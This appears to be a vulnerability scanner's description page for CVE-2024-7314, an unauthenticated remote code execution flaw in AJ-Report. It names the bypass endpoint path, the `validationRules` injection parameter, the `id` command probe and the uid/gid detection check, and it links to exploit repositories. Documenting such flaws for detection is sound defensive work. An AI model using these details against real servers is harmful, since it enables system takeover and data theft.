CVE-2024-7314 Scanner

AJ-Report is an open-source reporting platform used widely by developers and organizations to build and share business intelligence dashboards and reports. It is integrated into enterprise systems for rendering customizable datasets and presenting metrics for decision-makers. Developed by Anji-Plus, the software is frequently used in backend administration panels and reporting modules in Java environments. Users typically deploy AJ-Report in cloud environments or local networks to allow interactive data visualization. The platform's flexibility and Java-based architecture make it attractive for systems requiring seamless data integration and real-time reporting. However, due to its dynamic scripting capabilities, it's also a target for malicious exploitation.

This scanner detects a critical Remote Code Execution vulnerability found in AJ-Report versions prior to 1.4.1. The vulnerability arises from an authentication bypass flaw that allows unauthenticated attackers to inject and execute arbitrary Java code. It can be triggered through specially crafted HTTP POST requests by appending a specific path segment. This type of flaw is classified as critical due to its ability to give remote attackers full control of the system without needing credentials. The exploit leverages a misconfiguration in validation rules to run arbitrary scripts on the server. Attackers can use it to exfiltrate sensitive data or deploy backdoors for persistent access.

Technically, the vulnerability lies in the `/dataSetParam/verification;swagger-ui/` endpoint, which incorrectly bypasses authentication when a specific path is appended. The POST request payload injects Java code via the `validationRules` parameter, which is interpreted and executed by the Java script engine. The injected code creates a process to execute shell commands (e.g., `id`) and returns the result via a stream. The vulnerability is detectable by analyzing the server response for UNIX-like identifiers (uid/gid), indicating command execution. Proper request headers and content types are required to trigger and detect the flaw accurately.

Exploitation of this vulnerability can result in full system compromise. Attackers can run arbitrary system commands, steal sensitive information, create new user accounts, or install malware. The vulnerability also opens the door for lateral movement within the affected network, potentially impacting other systems. Organizations using vulnerable versions are exposed to high risks, including data breaches, financial loss, and compliance violations. If exploited in cloud environments, attackers may gain access to broader infrastructure components. The attack requires no user interaction, making it even more dangerous in exposed environments.

REFERENCES

• https://github.com/vulhub/vulhub/tree/master/aj-report/CNVD-2024-15077
• https://github.com/yuebusao/AJ-REPORT-EXPLOIT
• https://xz.aliyun.com/t/14460
• https://nvd.nist.gov/vuln/detail/CVE-2024-7314